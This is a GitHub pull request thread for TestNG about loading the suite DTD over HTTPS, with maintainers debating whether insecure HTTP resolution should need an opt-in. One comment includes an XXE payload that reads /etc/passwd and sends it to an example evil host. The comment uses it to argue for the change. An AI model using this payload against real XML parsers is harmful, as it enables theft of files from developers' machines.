Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use HTTPS for loading DTD #2023

Merged
merged 1 commit into from
Mar 9, 2019
Merged

Use HTTPS for loading DTD #2023

merged 1 commit into from
Mar 9, 2019

Conversation

krmahadevan
Copy link
Member

Closes #2022

Fixes #2022 .

Did you remember to?

  • Add test case(s)
  • Update CHANGES.txt

We encourage pull requests that:

  • Add new features to TestNG (or)
  • Fix bugs in TestNG

If your pull request involves fixing SonarQube issues then we would suggest that you please discuss this with the
TestNG-dev before you spend time working on it.

@krmahadevan krmahadevan requested a review from juherr March 2, 2019 07:02
@cbeust
Copy link
Collaborator

cbeust commented Mar 2, 2019

Awesome, thanks @krmahadevan !

/cc @JLLeitschuh

@JLLeitschuh
Copy link
Contributor

JLLeitschuh commented Mar 4, 2019
edited
Loading

Is the result = super.resolveEntity(systemId, publicId); still nessasary? For security purposes, I'd reccomend disabling resolving resources if they are HTTP based. If you still need to support resolving resources over HTTP, it should require users to explicitly opt-in to loading resources insecurely.

https://github.com/cbeust/testng/blob/9d1ea8c07f2dc337aaf37c26e5eb2f8eca4768d6/src/main/java/org/testng/xml/TestNGContentHandler.java#L105

https://github.com/cbeust/testng/blob/9d1ea8c07f2dc337aaf37c26e5eb2f8eca4768d6/src/main/java/org/testng/xml/TestNGContentHandler.java#L113

I'd also recommend making this an error instead of a warning (allow user opt-out if necessary).

https://github.com/cbeust/testng/blob/9d1ea8c07f2dc337aaf37c26e5eb2f8eca4768d6/src/main/java/org/testng/xml/TestNGContentHandler.java#L99-L105
If "fetching from the website" is made over HTTP, the DTD can be MITM leaving the user vulnerable to XXE.

@krmahadevan
Copy link
Member Author

krmahadevan commented Mar 4, 2019
edited
Loading

@JLLeitschuh

Is the result = super.resolveEntity(systemId, publicId); still nessasary?

IMO, yes. Else it would break backward compatibility.

If you still need to support resolving resources over HTTP, it should require users to explicitly opt-in to loading resources insecurely.

Why would TestNG want to control what a user wants to do ? That to me sounds like we are trying to control what a user would like to do. I can understand that TestNG should by itself strive to use only the https end-point, but why try to enforce that amongst users too ?

@JLLeitschuh
Copy link
Contributor

I can understand that TestNG should by itself strive to use only the https end-point, but why try to enforce that amongst users too?

Because you are protecting users from themselves. Most users don't understand the security risks of XML loaded over HTTP.

If via a MITM, a malicious actor can add the following to any DTD loaded, I can use their XML parser to maliciously exfiltrate the contents of files.

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'>
%param1;
%external;

Most users aren't aware of the risk of XXE against XML parsers. By requiring explicit opt-in, you are protecting users from shooting themselves in the foot.

@krmahadevan
Copy link
Member Author

@JLLeitschuh

Because you are protecting users from themselves. Most users don't understand the security risks of XML loaded over HTTP.

That to me doesn't sound like the primary responsibility of a test framework. TestNG is supposed to just be a test framework. Not sure if we are to be straying away from that and trying to put in checks and balances that would ensure that a user doesn't intentionally or unintentionally expose themselves to security risks.

@JLLeitschuh
Copy link
Contributor

TestNG is supposed to just be a test framework.

Correct. That being said, TestNG should not be something that an attacker can leverage to maliciously exfiltrate the contents of files from a developers machine or build server.

Not sure if we are to be straying away from that and trying to put in checks and balances that would ensure that a user doesn't intentionally or unintentionally expose themselves to security risks.

In some cases, I would agree, but in this case, since all it requires is a single character typo for a user to be vulnerable (http vs https), it is incredibly easy for TestNG to implement checks to protect the user.

Similarities with Issue #2018
Once the dust settles on this HTTP incident around resolving dependencies (I'm waiting on some other projects/teams to resolve the issue), I plan to open feature requests with Gradle, Maven, and SBT to suggest that all of these tools require the user to explicitly opt-out of the security offered by resolving dependencies over HTTPS.

It's so simple for users to unintentionally be vulnerable to this.

@krmahadevan
Copy link
Member Author

ping @cbeust @juherr - Your thoughts on this ?

@cbeust
Copy link
Collaborator

cbeust commented Mar 4, 2019

I lean toward accepting @JLLeitschuh's point right now, assuming we don't break backward compatibility.

Well, actually, even if we do break backward compatibility, we are about to release 7.0, so now would be the perfect time to do so.

juherr
juherr requested changes Mar 5, 2019
View reviewed changes
@krmahadevan krmahadevan requested a review from juherr March 9, 2019 05:56
juherr
juherr approved these changes Mar 9, 2019
View reviewed changes
Copy link
Member

@juherr juherr left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I like the new option! Good idea 👍

@krmahadevan krmahadevan merged commit 40ea46d into testng-team:master Mar 9, 2019
@krmahadevan krmahadevan deleted the fix_2022 branch March 9, 2019 09:53
@JLLeitschuh
Copy link
Contributor

Nice work @krmahadevan!

@juherr juherr mentioned this pull request Apr 5, 2019
Open
7 tasks
@zewa666 zewa666 mentioned this pull request Jun 7, 2019
Closed
@xirs xirs mentioned this pull request Nov 15, 2019
Closed
5 tasks
@xinlian12 xinlian12 mentioned this pull request Jun 14, 2021
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@JLLeitschuh JLLeitschuh JLLeitschuh left review comments

@juherr juherr juherr approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Suite.xml files make web request when suite uses DTD over HTTPS
4 participants
@krmahadevan @cbeust @JLLeitschuh @juherr